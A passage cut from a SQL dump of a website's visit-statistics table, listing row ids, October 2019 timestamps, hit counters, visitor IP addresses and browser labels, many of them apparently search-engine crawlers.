132','chrome'),(457319,1571709218,1,0,1,0,'207.46.13.121',''),(457320,1571709334,1,1,0,0,'8.29.198.25','other'),(457321,1571711046,1,1,0,0,'213.180.203.44','other'),(457322,1571711341,1,1,0,0,'141.8.142.2','other'),(457323,1571711889,1,1,0,0,'115.28.240.215','other'),(457324,1571714180,1,1,0,0,'157.55.39.133','other'),(457325,1571714669,1,1,0,0,'157.55.39.47','other'),(457326,1571715237,1,1,0,0,'141.8.183.15','other'),(457327,1571715299,1,1,0,0,'66.249.65.132','chrome'),(457328,1571716725,1,1,0,0,'157.55.39.133','other'),(457329,1571716939,1,1,0,0,'157.55.39.47','other'),(457330,1571716968,2,2,0,0,'66.249.65.134','chrome'),(457331,1571718787,1,1,0,0,'66.249.65.97','chrome'),(457332,1571719248,1,1,0,0,'91.209.11.236','other'),(457333,1571719834,1,1,0,0,'8.29.198.27','other'),(457334,1571720136,1,1,0,0,'207.46.13.80','other'),(457335,1571720202,1,1,0,0,'8.29.198.26','other'),(457336,1571720919,1,1,0,0,'13.66.139.0','other'),(457337,1571721251,1,1,0,0,'91.196.177.46','chrome'),(457338,1571721509,1,1,0,0,'66.249.65.100','chrome'),(457339,1571721631,1,1,0,0,'213.180.203.44','other'),(457340,1571722660,1,1,0,0,'157.55.39.47','other'),(457341,1571723609,2,2,0,0,'213.180.203.37','other'),(457342,1571723755,1,1,0,0,'157.55.39.133','other'),(457343,1571723888,1,1,0,0,'37.55.227.90','chrome'),(457344,1571724795,1,1,0,0,'91.196.178.167','chrome'),(457345,1571725330,1,1,0,0,'13.66.139.0','other'),(457346,1571725488,1,1,0,0,'213.180.203.37','other'),(457347,1571725847,1,1,0,0,'157.55.39.170','other'),(457348,1571725955,2,2,0,0,'157.55.39.133','other'),(457349,1571727340,1,1,0,0,'157.55.39.170','other'),(457350,1571728188,1,1,0,0,'91.196.178.86','chrome'),(457351,1571728285,1,1,0,0,'213.180.203.44','other'),(457352,1571728654,1,1,0,0,'91.196.178.72','chrome'),(457353,1571729448,1,1,0,0,'213.180.203.37','other'),(457354,1571729452,2,2,0,0,'66.249.64.69','chrome'),(457355,1571730496,1,1,0,0,'213.180.203.44','other'),(457356,1571730716,2,2,0,0,'8.29.198.25','other'),(457357,1571732414,1,1,0,0,'207.46.13.96','other'),(457358,1571732868,1,1,0,0,'91.196.178.72','chrome'),(457359,1571732981,1,1,0,0,'178.154.200.33','other'),(457360,1571733078,1,1,0,0,'91.196.178.183','chrome'),(457361,1571733394,1,1,0,0,'157.55.39.81','other'),(457362,1571735089,2,2,0,0,'91.196.178.72','chrome'),(457363,1571736154,1,1,0,0,'91.196.178.72','chrome'),(457364,1571736547,2,2,0,0,'213.180.203.44','other'),(457365,1571739149,1,1,0,0,'66.249.64.66','chrome'),(457366,1571739834,1,1,0,0,'91.196.178.14','chrome'),(457367,1571740035,1,1,0,0,'213.180.203.44','other'),(457368,1571740267,1,1,0,0,'91.196.177.222','other'),(457369,1571740274,1,1,0,0,'91.196.178.129','chrome'),(457370,1571740291,1,1,0,0,'91.196.177.193','chrome'),(457371,1571740932,1,1,0,0,'207.46.13.208','other'),(457372,1571741597,1,1,0,0,'8.29.198.26','other'),(457373,1571741942,1,1,0,0,'8.29.198.25','other'),(457374,1571742428,1,1,0,0,'13.66.139.0','other'),(457375,1571742576,1,1,0,0,'37.73.202.161','chrome'),(457376,1571742710,1,1,0,0,'207.46.13.208','other'),(457377,1571742716,1,1,0,0,'207.46.13.191','other'),(457378,1571742989,1,1,0,0,'213.180.203.37','other'),(457379,1571743298,1,1,0,0,'91.196.178.72','chrome'),(457380,1571743302,1,1,0,0,'91.209.11.236','other'),(457381,1571743547,1,1,0,0,'178.133.69.57','chrome'),(457382,1571744228,1,1,0,0,'207.46.13.191','other'),(457383,1571744501,3,2,1,0,'207.46.13.208',''),(457384,1571744885,2,2,0,0,'91.124.182.170','chrome'),(457385,1571745086,1,1,0,0,'91.196.178.72','chrome'),(457386,1571745776,1,1,0,0,'109.74.154.72','chrome'),(457387,1571745987,1,1,0,0,'91.196.178.72','chrome'),(457388,1571746116,1,1,0,0,'66.249.64.94','chrome'),(457389,1571746624,1,0,1,0,'66.249.64.66',''),(457390,1571747647,1,1,0,0,'207.46.13.191','other'),(457391,1571747705,1,1,0,0,'92.63.111.27','chrome'),(457392,1571748028,1,1,0,0,'109.251.94.29','chrome'),(457393,1571748895,1,1,0,0,'91.196.178.72','chrome'),(457394,1571750065,2,2,0,0,'66.249.64.94','chrome'),(457395,1571751004,1,1,0,0,'185.154.72.12','other'),(457396,1571752226,1,1,0,0,'91.196.178.72','chrome'),(457397,1571752494,1,1,0,0,'8.29.198.26','other'),(457398,1571752786,1,1,0,0,'13.66.139.0','other'),(457399,1571752821,1,1,0,0,'8.29.198.27','other'),(457400,1571752989,1,1,0,0,'91.196.177.44','chrome'),(457401,1571753417,1,1,0,0,'94.178.199.170','chrome'),(457402,1571754013,1,1,0,0,'213.180.203.44','other'),(457403,1571754089,1,1,0,0,'141.8.142.2','other'),(457404,1571754535,1,1,0,0,'207.46.13.208','other'),(457405,1571754553,1,1,0,0,'91.209.11.236','other'),(457406,1571754961,1,1,0,0,'213.180.203.37','other'),(457407,1571755250,1,1,0,0,'213.180.203.44','other'),(457408,1571755390,1,1,0,0,'207.46.13.191','other'),(457409,1571756547,1,1,0,0,'13.66.139.0','other'),(457410,1571756567,1,1,0,0,'157.55.39.181','other'),(457411,1571757545,1,1,0,0,'213.180.203.44','other'),(457412,1571757620,1,1,0,0,'157.55.39.181','other'),(457413,1571757671,1,1,0,0,'66.249.64.94','chrome'),(457414,1571758975,1,1,0,0,'157.55.39.81','other'),(457415,1571760084,1,1,0,0,'91.196.178.80','firefox'),(457416,1571762170,1,1,0,0,'157.55.39.57','other'),(457417,1571762524,1,1,0,0,'91.209.11.236','other'),(457418,1571763383,1,1,0,0,'8.29.198.25','other'),(457419,1571763690,1,1,0,0,'8.29.198.26','other'),(457420,1571763822,2,2,0,0,'157.55.39.181','other'),(457421,1571764150,2,2,0,0,'193.106.30.99','chrome'),(457422,1571764233,1,1,0,0,'66.249.64.94','chrome'),(457423,1571764715,1,1,0,0,'95.108.213.61','other'),(457424,1571766096,1,1,0,0,'46.211.158.91','chrome'),(457425,1571766273,2,0,2,0,'157.55.39.228',''),(457426,1571768471,1,1,0,0,'66.249.64.69','chrome'),(457427,1571769224,1,1,0,0,'141.8.142.177','other'),(457428,1571769322,1,1,0,0,'141.8.132.2','other'),(457429,1571769498,2,2,0,0,'157.55.39.228','other'),(457430,1571769699,1,1,0,0,'37.9.113.33','other'),(457431,1571770619,1,1,0,0,'66.249.64.66','chrome'),(457432,1571770928,1,1,0,0,'37.9.113.163','other'),(457433,1571770949,1,1,0,0,'141.8.142.164','other'),(457434,1571771722,1,1,0,0,'157.55.39.57','other'),(457435,1571772478,1,1,0,0,'157.55.39.224','other'),(457436,1571772717,2,0,2,0,'157.55.39.57',''),(457437,1571772791,1,1,0,0,'157.55.39.122','other'),(457438,1571773697,1,1,0,0,'66.249.64.69','chrome'),(457439,1571774113,2,2,0,0,'95.211.209.246','chrome'),(457440,1571774129,1,1,0,0,'66.249.93.216','chrome'),(457441,1571774144,1,1,0,0,'37.9.113.200','other'),(457442,1571774255,2,2,0,0,'8.29.198.25','other'),(457443,1571774290,1,1,0,0,'141.8.132.19','other'),(457444,1571774436,1,1,0,0,'157.55.39.181','other'),(457445,1571774960,1,1,0,0,'178.154.200.60','other'),(457446,1571775954,3,0,3,0,'157.55.39.181',''),(457447,1571775972,2,2,0,0,'157.55.39.122','other'),(457448,1571776577,1,1,0,0,'141.8.132.12','other'),(457449,1571777149,1,0,1,0,'157.55.39.181',''),(457450,1571778052,2,2,0,0,'66.249.64.69','chrome'),(457451,1571778592,1,1,0,0,'141.8.132.19','other'),(457452,1571778761,1,1,0,0,'141.8.188.25','other'),(457453,1571778832,1,1,0,0,'157.55.39.224','other'),(457454,1571780356,1,1,0,0,'157.55.39.57','other'),(457455,1571780584,1,1,0,0,'35.223.221.244','other'),(457456,1571782697,1,1,0,0,'141.8.142.164','other'),(457457,1571782775,2,1,1,0,'157.55.39.224',''),(457458,1571783909,1,0,1,0,'157.55.39.184',''),(457459,1571784011,1,1,0,0,'17.58.101.25','other'),(457460,1571785128,2,2,0,0,'8.29.198.25','other'),(457461,1571785153,1,0,1,0,'157.55.39.184',''),(457462,1571787522,1,1,0,0,'141.8.188.12','other'),(457463,1571787584,1,1,0,0,'157.55.39.184','other'),(457464,1571787858,1,1,0,0,'37.9.113.163','other'),(457465,1571789923,1,1,0,0,'157.55.39.224','other'),(457466,1571790581,1,1,0,0,'91.209.11.236','other'),(457467,1571790923,1,1,0,0,'178.154.200.33','other'),(457468,1571791713,1,1,0,0,'91.209.11.236','other'),(457469,1571794842,1,1,0,0,'141.8.142.50','other'),(457470,1571795999,2,2,0,0,'8.29.198.26','other'),(457471,1571797249,1,1,0,0,'87.250.224.90','other'),(457472,1571797278,1,1,0,0,'141.8.132.2','other'),(457473,1571798120,1,1,0,0,'141.8.132.19','other'),(457474,1571799590,1,1,0,0,'5.45.207.65','other'),(457475,1571799820,1,1,0,0,'207.46.13.151','other'),(457476,1571801064,1,1,0,0,'207.46.13.24','other'),(457477,1571801926,1,1,0,0,'95.108.213.3','other'),(457478,1571803580,1,1,0,0,'207.46.13.161','other'),(457479,1571804521,1,1,0,0,'207.46.13.161','other'),(457480,1571805292,1,1,0,0,'207.46.13.16','other'),(457481,1571805376,1,1,0,0,'5.45.207.65','other'),(457482,1571805439,1,1,0,0,'141.8.142.119','other'),(457483,1571805829,1,1,0,0,'207.46.13.161','other'),(457484,1571806555,1,1,0,0,'5.45.207.65','other'),(457485,1571806576,1,1,0,0,'141.8.183.33','other'),(457486,1571806782,1,1,0,0,'46.211.240.209','chrome'),(457487,1571806875,1,1,0,0,'8.29.198.25','other'),(457488,1571807130,1,1,0,0,'8.29.198.27','other'),(457489,1571807813,1,1,0,0,'95.108.213.3','other'),(457490,1571807992,1,1,0,0,'66.249.64.69','chrome'),(457491,1571809391,1,1,0,0,'207.46.13.24','other'),(457492,1571811576,1,0,1,0,'207.46.13.161',''),(457493,1571812772,1,1,0,0,'66.249.64.66','chrome'),(457494,1571812898,1,1,0,0,'207.46.13.24','other'),(457495,1571814514,1,1,0,0,'91.196.178.186','firefox'),(457496,1571814613,1,1,0,0,'66.249.64.66','chrome'),(457497,1571814708,1,1,0,0,'141.8.188.25','other'),(457498,1571815350,1,1,0,0,'185.93.184.94','chrome'),(457499,1571815955,1,1,0,0,'91.196.178.72','chrome'),(457500,1571816093,1,1,0,0,'141.8.183.33','other'),(457501,1571816256,1,1,0,0,'207.46.13.161','other'),(457502,1571816852,1,1,0,0,'141.8.188.18','other'),(457503,1571816892,1,1,0,0,'207.46.13.171','other'),(457504,1571817222,1,1,0,0,'91.196.178.72','chrome'),(457505,1571817752,2,2,0,0,'8.29.198.26','other'),(457506,1571818100,1,1,0,0,'91.196.178.71','chrome'),(457507,1571818114,2,1,1,0,'157.55.39.207',''),(457508,1571818336,1,1,0,0,'37.9.113.177','other'),(457509,1571819097,1,1,0,0,'91.196.178.72','chrome'),(457510,1571820009,1,1,0,0,'66.249.64.66','chrome'),(457511,1571821629,1,1,0,0,'87.250.224.104','other'),(457512,1571822327,1,1,0,0,'66.249.64.16','chrome'),(457513,1571822700,1,1,0,0,'141.8.183.15','other'),(457514,1571822765,1,1,0,0,'66.249.64.18','chrome'),(457515,1571822937,1,1,0,0,'66.249.64.66','chrome'),(457516,1571822971,1,1,0,0,'37.9.113.200','other'),(457517,1571823421,1,1,0,0,'66.249.64.94','chrome'),(457518,1571824003,1,1,0,0,'188.163.7.73','chrome'),(457519,1571824411,1,1,0,0,'193.106.30.99','chrome'),(457520,1571824642,1,1,0,0,'91.196.178.169','chrome'),(457521,1571824834,1,0,1,0,'157.55.39.207',''),(457522,1571824871,1,0,1,0,'157.55.39.190',''),(457523,1571826412,1,1,0,0,'66.249.64.94','chrome'),(457524,1571826559,1,1,0,0,'66.249.64.66','chrome'),(457525,1571827050,1,1,0,0,'66.249.64.69','chrome'),(457526,1571827095,1,1,0,0,'157.55.39.207','other'),(457527,1571827553,2,2,0,0,'95.213.141.126','opera'),(457528,1571827644,1,1,0,0,'37.9.113.163','other'),(457529,1571827658,1,1,0,0,'66.249.64.94','chrome'),(457530,1571828635,1,1,0,0,'8.29.198.25','other'),(457531,1571828733,1,1,0,0,'37.9.113.39','other'),(457532,1571828744,1,1,0,0,'141.8.142.128','other'),(457533,1571828770,2,2,0,0,'157.55.39.190','other'),(457534,1571828865,1,1,0,0,'8.29.198.27','other'),(457535,1571829113,2,2,0,0,'207.46.13.156','other'),(457536,1571830053,1,1,0,0,'91.196.178.174','chrome'),(457537,1571830099,1,1,0,0,'46.243.221.63','chrome'),(457538,1571830620,1,1,0,0,'91.196.178.72','chrome'),(457539,1571830687,1,1,0,0,'157.55.39.62','other'),(457540,1571830825,1,1,0,0,'5.254.96.148','msie'),(457541,1571831510,1,1,0,0,'66.249.64.66','chrome'),(457542,1571831545,1,1,0,0,'31.148.135.127','chrome'),(457543,1571831602,1,1,0,0,'87.250.224.90','other'),(457544,1571831756,1,0,1,0,'207.46.13.156',''),(457545,1571832426,1,1,0,0,'141.8.183.15','other'),(457546,1571833217,1,1,0,0,'157.55.39.149','other'),(457547,1571833245,1,1,0,0,'91.196.178.186','chrome'),(457548,1571833447,1,1,0,0,'178.154.200.13','other'),(457549,1571833552,1,1,0,0,'157.55.39.214','other'),(457550,1571834370,1,1,0,0,'46.211.103.142','other'),(457551,1571834373,1,1,0,0,'157.55.39.156','other'),(457552,1571834670,1,1,0,0,'66.249.64.94','chrome'),(457553,1571834821,1,1,0,0,'46.211.130.75','chrome'),(457554,1571834953,1,1,0,0,'157.55.39.214','other'),(457555,1571835804,1,1,0,0,'66.249.64.94','chrome'),(457556,1571835878,1,1,0,0,'5.45.207.65','other'),(457557,1571836198,1,1,0,0,'207.46.13.55','other'),(457558,1571836631,1,1,0,0,'109.74.154.72','chrome'),(457559,1571836652,1,1,0,0,'37.9.113.6','other'),(457560,1571836925,1,1,0,0,'52.162.161.148','other'),(457561,1571836956,1,1,0,0,'141.8.188.25','other'),(457562,1571837537,2,2,0,0,'157.55.39.156','other'),(457563,1571837664,1,1,0,0,'66.249.64.66','chrome'),(457564,1571838171,1,1,0,0,'37.9.113.177','other'),(457565,1571838773,1,1,0,0,'46.211.135.70','chrome'),(457566,1571838924,1,1,0,0,'66.249.64.94','chrome'),(457567,1571839292,1,1,0,0,'37.9.113.33','other'),(457568,1571839421,1,1,0,0,'91.209.11.236','other'),(457569,1571839556,2,2,0,0,'8.29.198.26','other'),(457570,1571840088,1,1,0,0,'46.211.135.70','chrome'),(457571,1571840835,1,1,0,0,'157.55.39.149','other'),(457572,1571842768,1,1,0,0,'37.9.113.6','other'),(457573,1571842784,1,1,0,0,'91.196.178.77','firefox'),(457574,1571843666,1,1,0,0,'66.249.64.94','chrome'),(457575,1571844037,1,1,0,0,'66.249.64.69','chrome'),(457576,1571844335,1,1,0,0,'91.209.11.236','other'),(457577,1571845084,3,3,0,0,'66.249.64.94','chrome'),(457578,1571845141,1,1,0,0,'87.250.224.90','other'),(457579,1571845470,1,1,0,0,'141.8.142.177','other'),(457580,1571845491,1,1,0,0,'141.8.142.119','other'),(457581,1571845494,1,1,0,0,'37.9.113.33','other'),(457582,1571849133,1,1,0,0,'87.250.224.90','other'),(457583,1571849150,2,2,0,0,'157.55.39.149','other'),(457584,1571849165,1,1,0,0,'141.8.132.2','other'),(457585,1571849326,1,1,0,0,'46.211.120.10','chrome'),(457586,1571849600,1,1,0,0,'118.89.139.150','other'),(457587,1571849819,1,1,0,0,'31.13.127.17','other'),(457588,1571849820,1,1,0,0,'31.13.127.5','other'),(457589,1571850451,1,1,0,0,'8.29.198.26','other'),(457590,1571850641,1,1,0,0,'8.29.198.25','other'),(457591,1571851153,1,0,1,0,'66.249.64.69',''),(457592,1571851369,1,1,0,0,'5.45.207.65','other'),(457593,1571851609,2,2,0,0,'66.249.64.94','chrome'),(457594,1571851942,1,1,0,0,'141.8.188.25','other'),(457595,1571851973,2,2,0,0,'66.249.64.66','chrome'),(457596,1571852441,1,1,0,0,'157.55.39.149','other'),(457597,1571852502,1,1,0,0,'31.13.127.14','other'),(457598,1571852504,1,1,0,0,'31.13.127.9','other'),(457599,1571852569,1,1,0,0,'185.154.72.12','other'),(457600,1571852703,1,1,0,0,'95.108.213.3','other'),(457601,1571853826,1,1,0,0,'178.154.200.60','other'),(457602,1571854145,1,1,0,0,'91.196.178.70','chrome'),(457603,1571854725,1,1,0,0,'157.55.39.156','other'),(457604,1571855078,1,0,1,0,'207.46.13.250',''),(457605,1571855106,1,1,0,0,'141.8.132.19','other'),(457606,1571855114,1,1,0,0,'37.9.113.39','other'),(457607,1571856338,1,1,0,0,'141.8.188.20','other'),(457608,1571856708,1,1,0,0,'91.195.3.232','firefox'),(457609,1571857201,1,1,0,0,'66.249.64.69','chrome'),(457610,1571859230,1,1,0,0,'157.55.39.156','other'),(457611,1571859369,1,1,0,0,'209.208.62.201','chrome'),(457612,1571860280,1,1,0,0,'37.9.113.10','other'),(457613,1571861318,2,2,0,0,'8.29.198.25','other'),(457614,1571861461,1,1,0,0,'46.98.195.41','chrome'),(457615,1571861710,1,1,0,0,'91.209.11.236','other'),(457616,1571862389,1,1,0,0,'66.249.64.66','chrome'),(457617,1571865271,1,1,0,0,'157.55.39.164','other'),(457618,1571867265,1,1,0,0,'141.8.142.119','other'),(457619,1571868631,2,2,0,0,'157.55.39.205','other'),(457620,1571869696,1,1,0,0,'37.9.113.10','other'),(457621,1571870174,1,1,0,0,'5.45.207.65','other'),(457622,1571870602,1,1,0,0,'5.45.207.49','other'),(457623,1571870630,1,1,0,0,'157.55.39.164','other'),(457624,1571871020,1,1,0,0,'141.8.188.12','other'),(457625,1571872180,1,1,0,0,'8.29.198.27','other'),(457626,1571872354,1,1,0,0,'8.29.198.25','other'),(457627,1571873364,1,1,0,0,'141.8.132.19','other'),(457628,1571875495,1,1,0,0,'157.55.39.164','other'),(457629,1571875968,1,1,0,0,'141.8.183.33','other'),(457630,1571875981,1,1,0,0,'141.8.142.177','other'),(457631,1571876167,1,1,0,0,'66.249.64.66','chrome'),(457632,1571876450,1,1,0,0,'66.249.64.69','chrome'),(457633,1571876891,2,2,0,0,'207.46.13.134','other'),(457634,1571878189,1,1,0,0,'207.46.13.134','other'),(457635,1571879042,1,1,0,0,'207.46.13.22','other'),(457636,1571880360,2,0,2,0,'157.55.39.119',''),(457637,1571880743,1,1,0,0,'141.8.142.128','other'),(457638,1571881964,1,1,0,0,'141.8.188.12','other'),(457639,1571882117,1,1,0,0,'5.254.96.148','msie'),(457640,1571882288,1,1,0,0,'207.46.13.22','other'),(457641,1571882293,1,0,1,0,'157.55.39.119',''),(457642,1571882459,1,0,1,0,'207.46.13.134',''),(457643,1571883025,1,1,0,0,'207.46.13.134','other'),(457644,1571883033,1,1,0,0,'8.29.198.27','other'),(457645,1571883207,1,1,0,0,'8.29.198.25','other'),(457646,1571883289,1,1,0,0,'5.45.207.65','other'),(457647,1571886254,1,1,0,0,'141.8.183.18','other'),(457648,1571886977,1,1,0,0,'37.9.113.163','other'),(457649,1571888291,1,1,0,0,'207.46.13.63','other'),(457650,1571889446,1,1,0,0,'37.9.113.142','other'),(457651,1571890139,1,1,0,0,'141.8.132.12','other'),(457652,1571890158,1,1,0,0,'193.106.30.99','chrome'),(457653,1571890617,1,1,0,0,'141.8.188.39','other'),(457654,1571890650,1,1,0,0,'141.8.188.66','other'),(457655,1571890795,1,1,0,0,'141.8.188.25','other'),(457656,1571891250,1,1,0,0,'66.249.64.66','chrome'),(457657,1571892348,1,1,0,0,'91.196.178.132','firefox'),(457658,1571892815,1,1,0,0,'178.154.171.66','other'),(457659,1571893597,1,1,0,0,'193.106.30.99','chrome'),(457660,1571893892,1,1,0,0,'8.29.198.25','other'),(457661,1571894077,1,1,0,0,'8.29.198.26','other'),(457662,1571894321,1,1,0,0,'141.8.142.119','other'),(457663,1571894539,1,1,0,0,'66.249.64.94','chrome'),(457664,1571895480,1,1,0,0,'66.249.64.69','chrome'),(457665,1571897046,1,1,0,0,'141.8.188.39','other'),(457666,1571897237,1,1,0,0,'141.8.142.50','other'),(457667,1571897511,1,1,0,0,'93.171.245.229','chrome'),(457668,1571897975,1,1,0,0,'95.135.241.234','firefox'),(457669,1571898263,1,1,0,0,'141.8.132.2','other'),(457670,1571898942,2,2,0,0,'66.249.64.94','chrome'),(457671,1571899733,1,1,0,0,'173.212.233.72','chrome'),(457672,1571901042,1,1,0,0,'207.46.13.56','other'),(457673,1571901419,1,1,0,0,'207.46.13.244','other'),(457674,1571901723,1,1,0,0,'91.196.178.72','chrome'),(457675,1571903360,1,1,0,0,'207.46.13.65','other'),(457676,1571904373,1,1,0,0,'66.249.64.66','chrome'),(457677,1571904416,1,1,0,0,'141.8.132.19','other'),(457678,1571904426,1,1,0,0,'87.250.224.104','other'),(457679,1571904757,1,1,0,0,'193.29.15.39','other'),(457680,1571904770,1,1,0,0,'8.29.198.27','other'),(457681,1571904811,1,1,0,0,'91.196.178.72','chrome'),(457682,1571904890,1,1,0,0,'46.120.255.82','chrome'),(457683,1571904935,1,1,0,0,'8.29.198.25','other'),(457684,1571905438,1,1,0,0,'37.9.113.200','other'),(457685,1571905496,1,1,0,0,'141.8.142.50','other'),(457686,1571906787,1,1,0,0,'66.249.64.94','chrome'),(457687,1571907309,1,1,0,0,'141.8.188.20','other'),(457688,1571907920,1,1,0,0,'141.8.132.12','other'),(457689,1571908053,1,1,0,0,'66.249.64.94','chrome'),(457690,1571908518,1,1,0,0,'91.196.178.72','chrome'),(457691,1571908898,1,1,0,0,'66.249.64.69','chrome'),(457692,1571909311,1,1,0,0,'91.196.179.33','chrome'),(457693,1571911546,1,1,0,0,'66.249.64.69','chrome'),(457694,1571911788,2,2,0,0,'66.249.64.94','chrome'),(457695,1571912465,1,1,0,0,'91.196.177.72','chrome'),(457696,1571913264,1,1,0,0,'91.219.252.158','chrome'),(457697,1571914342,1,1,0,0,'66.249.64.66','chrome'),(457698,1571914434,1,1,0,0,'141.8.183.33','other'),(457699,1571914516,1,1,0,0,'141.8.188.25','other'),(457700,1571914874,1,1,0,0,'91.209.11.236','other'),(457701,1571915624,1,1,0,0,'8.29.198.25','other'),(457702,1571915805,1,1,0,0,'8.29.198.27','other'),(457703,1571916736,1,1,0,0,'109.74.154.72','chrome'),(457704,1571917425,1,1,0,0,'141.8.132.12','other'),(457705,1571917900,1,1,0,0,'37.9.113.6','other'),(457706,1571918435,1,1,0,0,'66.249.64.69','chrome'),(457707,1571918470,1,1,0,0,'141.8.142.128','other'),(457708,1571918663,1,1,0,0,'141.8.188.18','other'),(457709,1571919004,1,1,0,0,'207.46.13.10','other'),(457710,1571920205,1,1,0,0,'141.8.142.132','other'),(457711,1571920513,1,1,0,0,'66.249.64.69','chrome'),(457712,1571921188,1,1,0,0,'141.8.188.25','other'),(457713,1571921272,1,1,0,0,'66.249.64.66','chrome'),(457714,1571922546,1,1,0,0,'37.9.113.202','other'),(457715,1571922768,1,1,0,0,'37.73.162.58','chrome'),(457716,1571922814,1,1,0,0,'66.249.64.94','chrome'),(457717,1571923979,1,1,0,0,'37.9.113.163','other'),(457718,1571924137,1,1,0,0,'91.196.178.72','chrome'),(457719,1571924270,1,1,0,0,'66.249.64.69','chrome'),(457720,1571924934,1,1,0,0,'157.55.39.184','other'),(457721,1571924959,2,2,0,0,'66.249.64.94','chrome'),(457722,1571925244,2,2,0,0,'66.249.64.18','chrome'),(457723,1571925289,2,2,0,0,'66.249.64.66','chrome'),(457724,1571925324,2,2,0,0,'66.249.64.69','chrome'),(457725,1571925658,1,1,0,0,'37.9.113.200','other'),(457726,1571925950,1,1,0,0,'141.8.142.119','other'),(457727,1571925972,1,1,0,0,'37.9.113.202','other'),(457729,1571926297,1,1,0,0,'66.249.64.66','chrome'),(457730,1571926497,1,1,0,0,'8.29.198.27','other'),(457731,1571926702,1,1,0,0,'8.29.198.26','other'),(457732,1571926987,1,0,1,0,'66.249.64.69',''),(457733,1571927404,1,1,0,0,'66.249.64.69','chrome'),(457734,1571928577,1,1,0,0,'141.8.132.2','other'),(457735,1571928971,1,1,0,0,'66.249.64.69','chrome'),(457736,1571929239,1,1,0,0,'157.55.39.184','other'),(457737,1571931353,1,1,0,0,'141.8.188.39','other'),(457738,1571931761,1,1,0,0,'37.9.113.177','other'),(457739,1571931931,1,1,0,0,'66.249.64.18','chrome'),(457740,1571931960,1,1,0,0,'37.9.113.202','other'),(457741,1571933154,1,1,0,0,'157.55.39.235','other'),(457742,1571933429,2,2,0,0,'66.249.64.69','chrome'),(457743,1571933517,1,1,0,0,'37.9.113.200','other'),(457744,1571934471,1,1,0,0,'178.154.200.33','other'),(457745,1571934824,1,1,0,0,'141.8.142.177','other'),(457746,1571934829,2,1,1,0,'207.46.13.203',''),(457747,1571934834,1,1,0,0,'66.249.64.66','chrome'),(457748,1571934931,1,1,0,0,'37.9.113.200','other'),(457749,1571934981,2,2,0,0,'66.249.64.69','chrome'),(457750,1571935606,1,1,0,0,'141.8.183.33','other'),(457751,1571937024,1,1,0,0,'87.250.224.104','other'),(457752,1571937371,1,1,0,0,'8.29.198.26','other'),(457753,1571937594,1,1,0,0,'8.29.198.27','other'),(457754,1571938373,1,1,0,0,'66.249.64.66','chrome'),(457755,1571938675,1,1,0,0,'157.55.39.235','other'),(457756,1571940603,1,1,0,0,'66.249.64.69','chrome'),(457757,1571941044,1,1,0,0,'77.111.244.211','chrome'),(457758,1571941494,1,1,0,0,'66.249.64.66','chrome'),(457759,1571941778,1,1,0,0,'207.46.13.198','other'),(457760,1571942090,1,1,0,0,'5.45.207.65','other'),(457761,1571942782,1,1,0,0,'5.254.96.148','msie'),(457762,1571942871,1,1,0,0,'66.249.64.16','chrome'),(457763,1571943850,1,1,0,0,'207.182.140.210','other'),(457764,1571944839,1,1,0,0,'141.8.142.50','other'),(457765,1571946211,1,1,0,0,'207.46.13.83','other'),(457766,1571946524,1,1,0,0,'66.249.64.69','chrome'),(457767,1571946639,1,1,0,0,'37.9.113.202','other'),(457768,1571947788,1,1,0,0,'207.46.13.83','other'),(457769,1571948236,1,1,0,0,'8.29.198.26','other'),(457770,1571948499,1,1,0,0,'8.29.198.27','other'),(457771,1571948636,1,1,0,0,'207.46.13.198','other'),(457772,1571949011,1,1,0,0,'66.249.64.66','chrome'),(457773,1571950715,2,2,0,0,'66.249.64.94','chrome'),(457774,1571950796,1,1,0,0,'91.209.11.236','other'),(457775,1571951423,1,1,0,0,'66.249.64.69','chrome'),(457776,1571951514,1,1,0,0,'157.55.39.250','other'),(457777,1571952007,1,1,0,0,'207.46.13.223','other'),(457778,1571953246,1,1,0,0,'66.249.64.66','chrome'),(457779,1571953321,2,2,0,0,'157.55.39.240','other'),(457780,1571953374,1,1,0,0,'209.17.96.34','other'),(457781,1571954381,1,1,0,0,'141.8.142.50','other'),(457782,1571954786,1,1,0,0,'66.249.64.66','chrome'),(457783,1571954877,1,1,0,0,'66.249.64.94','chrome'),(457784,1571954996,1,1,0,0,'207.46.13.247','other'),(457785,1571956204,1,1,0,0,'157.55.39.250','other'),(457786,1571957217,1,1,0,0,'5.45.207.43','other'),(457787,1571957630,1,1,0,0,'207.46.13.223','other'),(457788,1571958535,1,1,0,0,'178.154.200.60','other'),(457789,1571958607,1,1,0,0,'207.46.13.247','other'),(457790,1571959029,1,1,0,0,'157.55.39.250','other'),(457791,1571959106,1,1,0,0,'8.29.198.27','other'),(457792,1571959385,1,1,0,0,'8.29.198.26','other'),(457793,1571960213,1,1,0,0,'66.249.64.18','chrome'),(457794,1571960675,2,2,0,0,'3.112.106.64','other'),(457795,1571962217,1,1,0,0,'207.46.13.17','other'),(457796,1571962244,1,1,0,0,'95.108.213.61','other'),(457797,1571963215,1,1,0,0,'66.249.64.94','chrome'),(457798,1571963250,1,1,0,0,'87.250.224.90','other'),(457799,1571964456,1,1,0,0,'141.8.188.12','other'),(457800,1571964534,1,1,0,0,'5.45.207.49','other'),(457801,1571965042,1,1,0,0,'66.249.64.94','chrome'),(457802,1571965646,1,1,0,0,'207.46.13.17','other'),(457803,1571966930,1,1,0,0,'5.101.51.210','other'),(457804,1571967791,1,1,0,0,'207.46.13.17','other'),(457805,1571968148,2,2,0,0,'66.249.64.94','chrome'),(457806,1571968209,1,1,0,0,'141.8.183.33','other'),(457807,1571969975,1,1,0,0,'8.29.198.27','other'),(457808,1571970265,1,1,0,0,'8.29.198.26','other'),(457809,1571970504,1,1,0,0,'157.55.39.156','other'),(457810,1571971121,1,1,0,0,'138.246.253.5','chrome'),(457811,1571971743,1,1,0,0,'91.196.178.75','chrome'),(457812,1571973074,1,1,0,0,'66.249.64.66','chrome'),(457813,1571973195,1,1,0,0,'157.55.39.156','other'),(457814,1571974226,1,1,0,0,'77.74.177.114','chrome'),(457815,1571974496,1,1,0,0,'66.249.64.94','chrome'),(457816,1571975069,1,1,0,0,'141.8.142.50','other'),(457817,1571975093,1,1,0,0,'178.154.200.60','other'),(457818,1571976007,2,2,0,0,'157.55.39.156','other'),(457819,1571976427,1,1,0,0,'66.249.64.16','chrome'),(457820,1571977576,1,1,0,0,'141.8.142.50','chrome'),(457821,1571979939,1,1,0,0,'141.8.188.39','other'),(457822,1571980045,1,1,0,0,'207.46.13.30','other'),(457823,1571980838,1,1,0,0,'8.29.198.25','other'),(457824,1571981126,1,1,0,0,'8.29.198.26','other'),(457825,1571981455,2,2,0,0,'207.46.13.213','other'),(457826,1571981622,1,1,0,